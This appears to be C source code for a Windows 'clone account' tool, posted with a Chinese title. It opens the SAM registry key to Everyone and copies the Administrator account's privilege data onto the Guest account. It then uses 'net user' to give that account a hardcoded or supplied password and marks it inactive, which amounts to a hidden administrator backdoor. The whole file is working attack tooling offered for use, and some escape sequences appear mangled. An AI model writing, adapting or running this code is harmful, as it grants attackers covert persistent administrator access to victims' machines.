|
c语言简单实现克隆帐户
#include <Windows.h>
#include <Aclapi.h>
#include <stdio.h>
#include <stdlib.h>
#include <tchar.h>
#pragma comment (lib,\"Advapi32.lib\")
#define MAX_KEY_LENGTH 255
#define MAX_VALUE_NAME 16383
DWORD user_flag = 0;
TCHAR cloneUser[1024];
void QueryKey(HKEY hKey);
void banner();
void text_color(WORD color)
{
HANDLE console = GetStdHandle(STD_OUTPUT_HANDLE);
SetConsoleTextAttribute(console, color);
}
int main(int argc, char **argv)
{
DWORD dwRet;
LPSTR SamName = _T(\"MACHINE\\SAM\\SAM\");
PSECURITY_DESCRIPTOR pSD = NULL;
PACL pOldDacl = NULL;
PACL pNewDacl = NULL;
EXPLICIT_ACCESS ea;
HKEY hKey = NULL;
LPBYTE lpDataF=NULL;
HKEY cKey, uKey;
DWORD Type=REG_BINARY,SizeF=1024*2;
TCHAR command[1024];
TCHAR command1[1024];
int ret;
// 初始化变量
lpDataF = (LPBYTE) malloc(1024*2);
ZeroMemory(lpDataF,1024*2);
// 显示作者和相关信息
banner();
// 获取SAM主键的DACL
dwRet = GetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, &pOldDacl, NULL, &pSD);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T(\"Set Privilege (1) Error: %d\"), dwRet);
text_color(12);
_tprintf(_T(\"[Fail]\\n\"));
text_color(7);
goto FreeAndExit;
}
// 创建一个ACE,允许Everyone完全控制对象,并允许子对象继承此权限
ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
BuildExplicitAccessWithName(&ea, _T(\"Everyone\"), KEY_ALL_ACCESS, SET_ACCESS,
SUB_CONTAINERS_AND_OBJECTS_INHERIT);
// 将新的ACE加入DACL
dwRet = SetEntriesInAcl(1, &ea, pOldDacl, &pNewDacl);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T(\"Set Privilege (2) Error: %d\"), dwRet);
text_color(12);
_tprintf(_T(\"[Fail]\\n\"));
text_color(7);
goto FreeAndExit;
}
// 更新SAM主键的DACL
dwRet = SetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, pNewDacl, NULL);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T(\"Set Privilege (3) Error: %d\"), dwRet);
text_color(12);
_tprintf(_T(\"[Fail]\\n\"));
text_color(7);
goto FreeAndExit;
}
_tprintf(_T(\"[+]Set Privilege..\"));
text_color(10);
_tprintf(_T(\"[OK]\\n\"));
text_color(7);
// 枚举用户
dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T(\"SAM\\SAM\\Domains\\Account\\Users\\Names\"),0, KEY_ALL_ACCESS,&uKey);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T(\"RegOpenKeyEx Error: %d\"), dwRet);
text_color(12);
_tprintf(_T(\"[Fail]\\n\"));
text_color(7);
goto FreeAndExit;
}
// 功能函数实现自动判断用户
QueryKey(uKey);
if(user_flag == 0){
text_color(12);
_tprintf(_T(\"The guest user may be delete!\\n\"));
text_color(7);
exit(0);
}
// 打开SAM的子键 1F4
dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T(\"SAM\\SAM\\Domains\\Account\\Users\\000001F4\"),
0, KEY_ALL_ACCESS, &hKey);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T(\"RegOpenKeyEx Error: %d\"), dwRet);
text_color(12);
_tprintf(_T(\"[Fail]\\n\"));
text_color(7);
goto FreeAndExit;
}
// 获得 1F4 的 F 键值
dwRet = RegQueryValueEx(hKey, _T(\"F\"), NULL, &Type,lpDataF,&SizeF);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T(\"RegQueryValueEx Error: %d\"), dwRet);
text_color(12);
_tprintf(_T(\"[Fail]\\n\"));
text_color(7);
goto FreeAndExit;
}
// 打开SAM的子键 1F5
dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T(\"SAM\\SAM\\Domains\\Account\\Users\\000001F5\"),
0, KEY_ALL_ACCESS, &cKey);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T(\"RegOpenKeyEx Error: %d\"), dwRet);
text_color(12);
_tprintf(_T(\"[Fail]\\n\"));
text_color(7);
goto FreeAndExit;
}
// clone
dwRet = RegSetValueEx(cKey,_T(\"F\"),0, REG_BINARY,lpDataF,SizeF);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T(\"RegSetValueEx Error: %d\"), dwRet);
text_color(12);
_tprintf(_T(\"[Fail]\\n\"));
text_color(7);
goto FreeAndExit;
}
text_color(7);
_tprintf(_T(\"[+]Clone Successfully..\"));
text_color(10);
_tprintf(_T(\"[OK]\\n\"));
text_color(7);
_tprintf(_T(\"[+]Try to set user password..\"));
text_color(10);
_tprintf(_T(\"[OK]\\n\"));
text_color(7);
// 禁用用户, 改密码
if(argc == 1)
{
//执行 net user xx pass
_tcscpy(command,_T(\"net user \"));
_tcscat(command,cloneUser);
_tcscat(command, _T(\" \"));
_tcscat(command, \"zzrjitop\");
text_color(0);
ret = system(command);
if (ret != 0)
{
text_color(7);
_tprintf(_T(\"Set password fail..\\n\"));
text_color(12);
_tprintf(_T(\"\\nFail\\n\"));
text_color(7);
exit(5);
}
//执行 net user xx /active:no
_tcscpy(command1,_T(\"net user \"));
_tcscat(command1,cloneUser);
_tcscat(command1,_T(\" /active:no\"));
// _tprintf(command1);
text_color(0);
ret = system(command1);
if (ret != 0)
{
text_color(7);
_tprintf(_T(\"Set password fail..\\n\"));
text_color(12);
_tprintf(_T(\"\\nFail\\n\"));
text_color(7);
exit(5);
}
text_color(14);
_tprintf(_T(\"[+]User: %s Password: zzrjitop\\n\"), cloneUser);
text_color(7);
}
if(argc ==2)
{
_tcscpy(command,_T(\"net user \"));
_tcscat(command,cloneUser);
_tcscat(command, _T(\" \"));
_tcscat(command, argv[1]);
text_color(0);
ret = system(command);
if (ret != 0)
{
text_color(7);
_tprintf(_T(\"Set password fail..\\n\"));
text_color(12);
_tprintf(_T(\"\\nFail\\n\"));
text_color(7);
exit(5);
}
//_tprintf(\"%s\",command);
//执行 net user xx /active:no
_tcscpy(command1,_T(\"net user \"));
_tcscat(command1,cloneUser);
_tcscat(command1,_T(\" /active:no\"));
text_color(0);
ret = system(command1);
if (ret != 0)
{
text_color(7);
_tprintf(_T(\"Set password fail..\\n\"));
text_color(12);
_tprintf(_T(\"\\nFail\\n\"));
text_color(7);
exit(5);
}
text_color(14);
_tprintf(_T(\"[+]\\rUser: %s Password: %s\\n\"), cloneUser, argv[1]);
text_color(7);
}
goto FreeAndExit;
FreeAndExit:
if (hKey) RegCloseKey(hKey);
if (pNewDacl) LocalFree(pNewDacl);
// 还原SAM主键的DACL
if (pOldDacl) dwRet = SetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, pOldDacl, NULL);
if (pSD) LocalFree(pSD);
return 0;
}
void QueryKey(HKEY hKey)
{
TCHAR achKey[MAX_KEY_LENGTH]; // buffer for subkey name
DWORD cbName; // size of name string
TCHAR achClass[MAX_PATH] = TEXT(\"\"); // buffer for class name
DWORD cchClassName = MAX_PATH; // size of class string
DWORD cSubKeys=0; // number of subkeys
DWORD cbMaxSubKey; // longest subkey size
DWORD cchMaxClass; // longest class string
DWORD cValues=0; // number of values for key
DWORD cchMaxValue; // longest value name
DWORD cbMaxValueData; // longest value data
DWORD cbSecurityDescriptor; // size of security descriptor
FILETIME ftLastWriteTime; // last write time
DWORD type = REG_BINARY, Size=1024*2;
LPBYTE lpData=NULL;
DWORD i, retCode;
HKEY tKey;
DWORD cchValue = MAX_VALUE_NAME;
TCHAR fulPath[] =_T(\"SAM\\SAM\\Domains\\Account\\Users\\Names\\\");
TCHAR temp[MAX_VALUE_NAME];
ZeroMemory(cloneUser,1024);
// Get the class name and the value count.
retCode = RegQueryInfoKey(
hKey, // key handle
achClass, // buffer for class name
&cchClassName, // size of class string
NULL, // reserved
&cSubKeys, // number of subkeys
&cbMaxSubKey, // longest subkey size
&cchMaxClass, // longest class string
&cValues, // number of values for this key
&cchMaxValue, // longest value name
&cbMaxValueData, // longest value data
&cbSecurityDescriptor, // security descriptor
&ftLastWriteTime); // last write time
// Enumerate the subkeys, until RegEnumKeyEx fails.
if (cSubKeys)
{
//printf( \"nNumber of subkeys: %dn\", cSubKeys);
for (i=0; i<cSubKeys; i++)
{
cbName = MAX_KEY_LENGTH;
retCode = RegEnumKeyEx(hKey, i,
achKey,
&cbName,
NULL,
NULL,
NULL,
&ftLastWriteTime);
if (retCode == ERROR_SUCCESS)
{
//_tprintf(TEXT(\"(%d) %s n\"), i+1, achKey);
ZeroMemory(temp,sizeof(temp));
_tcscpy(temp, fulPath);
_tcscat(temp,achKey);
//_tprintf(_T(\"%s n\"), temp);
retCode = RegOpenKeyEx(HKEY_LOCAL_MACHINE, temp, 0, KEY_ALL_ACCESS,&tKey);
if (retCode != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T(\"RegOpenKeyEx Error: %d\"), retCode);
text_color(12);
_tprintf(_T(\"[Fail]n\"));
text_color(7);
exit(0);
}
lpData = (LPBYTE)malloc(2*1024);
ZeroMemory(lpData,2*1024);
retCode = RegQueryValueEx(tKey, NULL, NULL, &type, lpData,&Size);
if (retCode != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T(\"RegQueryValueEx Error: %d\"), retCode);
text_color(12);
_tprintf(_T(\"[Fail]n\"));
text_color(7);
if(tKey) RegCloseKey(tKey);
exit(1);
}
if(type==0x1f5) {
text_color(7);
_tprintf(_T(\"[+]Starting clone %s..\"), achKey);
text_color(10);
_tprintf(_T(\"[OK]n\"));
text_color(7);
_tcscpy(cloneUser,achKey);
user_flag = 1;
break;
}
}
}
}
// Enumerate the key values.
}
void banner(){
_tprintf(_T(\"******************************************************n\"));
_tprintf(_T(\"* Clone account Tooln\"));
_tprintf(_T(\"* Clone the 1F5 usern\"));
_tprintf(_T(\"* Usage: clone.exe or clone.exe passn\"));
_tprintf(_T(\"*\"));
text_color(12);
_tprintf(_T(\" If clone successfully it was made by zz[E.S.t]n\"));
text_color(7);
_tprintf(_T(\"******************************************************nn\"));
} |
|